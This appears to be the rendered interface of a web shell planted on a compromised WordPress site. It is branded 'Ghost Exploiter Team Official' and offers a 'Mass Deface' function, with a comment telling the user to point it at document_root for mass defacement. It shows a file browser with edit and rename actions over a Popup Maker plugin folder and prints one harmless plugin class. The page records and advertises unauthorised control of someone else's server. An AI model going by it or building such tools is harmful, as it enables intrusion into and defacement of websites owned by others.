webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
aminiwrc
/
public_html11
/
wp-content
/
plugins
/
popup-maker
/
classes
/
Integration
/
Builder
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Bricks.php
6.467KB
edt
ren
KingComposer.php
0.521KB
edt
ren
VisualComposer.php
0.533KB
edt
ren
<?php /** * Integration for KingComposer * * @package PopupMaker * @copyright Copyright (c) 2024, Code Atlantic LLC */ class PUM_Integration_Builder_KingComposer extends PUM_Abstract_Integration { /** * @var string */ public $key = 'kingcomposer'; /** * @var string */ public $type = 'builder'; /** * @return string */ public function label() { return 'King Composer'; } /** * @return bool */ public function enabled() { return class_exists( 'KingComposer' ) || defined( 'KC_VERSION' ); } }
<=Back
Liking